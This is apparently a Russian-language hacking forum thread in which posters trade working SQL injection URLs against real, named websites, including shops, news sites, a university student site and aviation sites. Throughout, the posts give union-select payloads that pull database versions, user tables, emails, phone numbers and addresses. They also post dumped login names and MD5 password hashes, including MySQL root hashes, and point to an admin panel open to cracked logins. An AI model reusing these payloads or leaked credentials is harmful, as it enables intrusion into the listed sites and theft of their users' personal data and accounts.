Проверка на Антибояне(http://hlamidnik.h18.ru/SQLS.html) показала, что http://www.footballfoundation.com- БОЯН, при этом обработано только 62 страницы =\
http://www.htmlbook.ru/ - для тех, кто делает сайты /заглавие страницы/ http://www.htmlbook.ru/faq/?id=8&a=-41+union+select+1,concat_ws(char(58),version(),database(),user()),3,4,5/* - для тех, кто не только делает сайты
http://www.nterra.ru/index.php?lang=eng&path=regards&id=-26+union+select+1,2,3,4,5,6,7,8,9,table_name,11,12,13+from+information_schema.tables/*
Code: http://www.streetfighters.ru/shop/?id=-33+union+select+1,2,3,4,5,6,7,concat(full_name,0x3a,phone_number,0x3a,city,0x3a,street_address_b,0x3a,id,0x3a,email_address,0x3a),9+from+users/*
http://www.nakhodkamedia.ru/news.php?news_id=-563+union+select+1,2,0x3c68313e3c666f6e7420636f6c6f723d6c696d653e3a3a3a504950455a3a3a3a3c2f666f6e743e3c2f68313e,4,5/*
Извиняюсь за второй пост! http://www.ussurimedia.ru/news.php?news_id=-1451+union+select+1,21,2121212,122,1222/*
sql-inj Сайт: http://www.dubinushka.ru/ (Студенческий сайт Физического факультета МГУ) уязвимость: http://www.dubinushka.ru/photo_podthemes.php?pt_id=10' подобранные таблицы: users подобранные поля: login,pass 17 организмов Имеются на сайте: админка http://www.dubinushka.ru/admin/ В неё можно зайти под любым логином из 17-ти, зная пароль, (пароли md5, несколько сразу находятся в онлайне) Форум - ipb 2.1.7 - 5k+ организмов.
www.bluetouch.fr Ты хде же, це блютуч бачишь? Code: http://www.bluetouch.fr/fr/location/reservation.php?id_base=-16+union+select+concat(user(),char(58),version(),char(58),database())/*&type_bato=Oc%C3%A9anis%20361&id_bateau=28
www.vetdoctor.ru Code: http://www.vetdoctor.ru/news/text_reader.php?text_id=-124+union+select+1,2,3,4,5,6,7/*&category_id=24 www.bench-mark.ru Code: http://www.bench-mark.ru/main.php?text_id=-1294+union+select+1,concat(user(),char(58),version(),char(58),database()),3,4,5/*
www.modernpolitics.at Code: http://www.modernpolitics.at/text.php?id_text=-105+union+select+1,concat(user(),char(58),version(),char(58),database())/*
www.zonewm.biz Не нашел где деньги выводить Code: http://zonewm.biz/showa.php?id=-132+union+select+1,2,3,concat_ws(char(58,58),mail,pass),5,6,7,8+from+user+limit+1,1/* login : pass id:1 [email protected] d838d31c16c14b2765fa4c19ff0b9044 = allazar
2Isis уже было), скорей бы антибоян был готов=). http://neuroshima.elixir.int.pl/infopage.php?id=-1+union+select+count(concat_ws(0x3a,nick,pass,mail)),2+from+elixir_users/*
_http://midmich.net/news/read.php?id=-1+union+select+111,concat(user(),version(),database()),333,444,555/*
Незабываем проверять инжекты на АНТИБОЯНЕ Обработано уже 89 страниц, но одному этим заниматься очень утомительно Всем желающим помочь в создании антибоянного листа, просьба обращаться в личку, особенная помощь нужна в диапазоне 110-150 страницы. Кстати Isis- http://www.ladofon.ru- боян и BlackCats тоже набоянил =\
www.unicttaskforce.org PHP: http://www.unicttaskforce.org/perl/documents.pl?id=-1392+order+by+12/* http://z-tec.ru PHP: http://z-tec.ru/index/catalogue/showitem.php?id=-110+union+select+1/* www.cityslam.ru PHP: http://www.cityslam.ru/catalog.php?id=-101+union+select+1,2,3,4,5,6,concat_ws(char(58),version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20/* www.pec.spb.ru PHP: http://www.pec.spb.ru/dictionary/?id=-218+union+select+1,concat_ws(char(58),name,password,email),3+from+users+limit+8,1/* www.flugzeugbilder.de PHP: http://www.flugzeugbilder.de/show.php?id=-567978+union+select+1,2,3,4,5,concat_ws(char(58),version(),database(),user()),password,concat(user,char(58)),9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user+limit+4,1/* root: 3616438873d71bd2 ivax: 652fa1a75d18da89 wx: 68708852333c8a5e pp: 1b112489580fbed1 air: 2a98610a18cbfe30 всего 4 юзера.Кодировка по мойму MD5 Версия - 4.0.21-Max-log database - fb юзер - pp@localhost www.luftfahrt.net Сайт какойто Авиокампании. PHP: http://www.luftfahrt.net/galerie/showpix.php?id=-21276+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
